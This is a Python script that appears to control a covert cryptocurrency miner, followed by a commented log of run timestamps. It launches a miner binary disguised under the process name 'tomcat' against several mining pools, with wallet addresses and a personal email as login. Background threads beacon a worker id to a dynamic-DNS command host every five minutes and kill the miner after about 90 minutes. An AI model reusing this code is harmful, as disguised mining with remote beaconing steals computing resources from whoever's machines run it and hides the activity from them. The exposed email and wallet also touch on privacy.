import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:10:06.454518
#2018-02-17 16:56:01.552596
#2018-02-17 18:43:01.703871
#2018-02-17 20:31:05.301184
#2018-02-17 22:17:06.663202
#2018-02-18 00:01:02.127137
#2018-02-18 01:52:04.636926
#2018-02-18 03:40:04.252671
#2018-02-18 05:27:01.411520
#2018-02-18 07:19:03.927015
#2018-02-18 09:07:03.586000
#2018-02-18 10:53:06.233903
#2018-02-18 12:40:07.230766
#2018-02-18 14:27:02.046382
#2018-02-18 16:16:07.378269
#2018-02-18 18:04:05.397681
#2018-02-18 19:51:01.931669
#2018-02-18 21:39:06.163019
#2018-02-18 23:27:05.903303
#2018-02-19 01:14:04.529117
#2018-02-19 02:59:07.884541
#2018-02-19 04:46:01.850161
#2018-02-19 06:31:06.739546
#2018-02-19 08:20:05.567493
#2018-02-19 10:09:03.766202
#2018-02-19 11:57:09.165333
#2018-02-19 13:44:06.788728
#2018-02-19 15:33:05.969725
#2018-02-19 17:19:07.312637
#2018-02-19 19:06:08.738708
#2018-02-19 20:52:06.201851
#2018-02-19 22:41:04.108846
#2018-02-20 00:24:08.591932
#2018-02-20 02:13:05.591183
#2018-02-20 04:59:01.370902
#2018-02-20 07:43:04.450298
#2018-02-20 10:27:01.669049
#2018-02-20 12:11:09.199158
#2018-02-20 13:58:01.392489
#2018-02-20 15:41:07.511515
#2018-02-20 17:27:06.000008
#2018-02-20 19:16:09.061765
#2018-02-20 21:06:04.071779
#2018-02-20 22:52:06.686340
#2018-02-21 00:36:07.460132
#2018-02-21 02:24:05.324727
#2018-02-21 04:10:03.545805
#2018-02-21 05:57:06.331247
#2018-02-21 07:45:07.688545
#2018-02-21 09:32:07.084323
#2018-02-21 11:20:08.955518
#2018-02-21 13:09:07.937954
#2018-02-21 14:55:03.827625
#2018-02-21 16:43:11.597537
#2018-02-21 18:33:05.580761
#2018-02-21 20:19:01.713695
#2018-02-21 22:08:04.705288
#2018-02-21 23:54:07.215524
#2018-02-22 01:38:05.970655
#2018-02-22 03:25:09.165700
#2018-02-22 05:11:04.497943
#2018-02-22 06:55:07.408604
#2018-02-22 08:41:06.434124
#2018-02-22 10:28:01.604002
#2018-02-22 12:13:07.167803
#2018-02-22 13:59:05.561727
#2018-02-22 15:46:06.464827
#2018-02-22 17:33:05.400491
#2018-02-22 19:19:07.984778
#2018-02-22 21:12:06.200695
#2018-02-22 22:57:06.309763
#2018-02-23 00:45:06.488531
#2018-02-23 02:33:03.814317
#2018-02-23 04:22:07.581727
#2018-02-23 06:09:08.035593
#2018-02-23 07:54:05.247200
#2018-02-23 10:10:07.212821
#2018-02-23 12:05:11.874729
#2018-02-23 13:52:05.840187
#2018-02-23 15:42:03.801837
#2018-02-23 17:28:09.728850
#2018-02-23 19:14:07.746867
#2018-02-23 20:59:04.936255
#2018-02-23 22:46:01.762903
#2018-02-24 00:34:05.425634
#2018-02-24 02:25:03.820291
#2018-02-24 04:14:06.871597
#2018-02-24 06:02:04.313562
#2018-02-24 07:49:05.872721
#2018-02-24 09:34:06.158214
#2018-02-24 11:28:07.110687
#2018-02-24 13:17:03.972297
#2018-02-24 15:08:05.530227
#2018-02-24 16:57:07.139166
#2018-02-24 18:45:02.921348
#2018-02-24 20:36:05.150888
#2018-02-24 22:40:09.555876
#2018-02-25 01:47:06.082029
#2018-02-25 05:05:01.298544
#2018-02-25 10:12:01.916460